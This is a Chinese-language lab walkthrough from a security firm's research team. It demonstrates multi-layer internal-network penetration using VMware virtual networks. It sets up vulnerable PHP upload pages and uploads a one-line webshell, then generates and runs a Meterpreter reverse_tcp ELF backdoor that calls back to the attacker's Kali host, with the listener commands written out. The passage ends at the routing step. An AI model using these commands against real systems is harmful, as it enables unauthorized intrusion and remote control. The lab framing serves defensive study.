近年来,攻击者潜伏在企业内网进行攻击的安全事件屡见不鲜,攻击者在经常会企业的内网进行横向渗透,令防守方防不胜防。因此,我们应该严格控制好网络区域之间的访问规则,加大攻击横向渗透的阻力。本文由锦行科技的安全研究团队提供,旨在通过实验演示进一步了解攻击者是如何在多层内网进行的渗透。
用三层网络来模拟内外网环境,主要了解
MSF
、内网转发等
把渗透机kali和win10网卡1设置选择VMnet1:
靶机Linux网卡1设置选择VMnet1,添加网卡2 设置选择VMnet2:
将第二台靶机Linux网卡1设置选择VMnet2,添加网卡2 设置选择VMnet3:
将靶机win7网卡1设置选择VMnet3:
再配置好各台机器对应IP即可。
在第一台Linux和第二台Linux上搭建一个php上传页面,设为存在文件上传漏洞的web页面,以便后续的拿shell进行内网渗透
第一台Linux
第二台Linux
win10访问http://192.168.85.131/直接上传一句话木马
蚁剑连接
*进一步做内网渗透,上传msf后门*
打开kali msfconsole 输入
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.85.128 LPORT=4444 -f elf > mshell.elf
生成一个名为mshell.elf的msf后门文件
蚁剑把后门文件上传到Linux靶机
-
use exploit/multi/handler
使用监听模块
-
set payload linux/x64/meterpreter/reverse_tcp
使用和木马相同的
payload
-
set lhost 192.168.85.128
kaili
的
ip
-
set lport 4444
木马的端口
-
r
un
执行
蚁剑打开虚拟终端cd到后门文件的目录下,执行后门文件,输入
Kail接受到MSF会话
输入ifconfig,发现第二层172.10.10.0/24网段
添加路由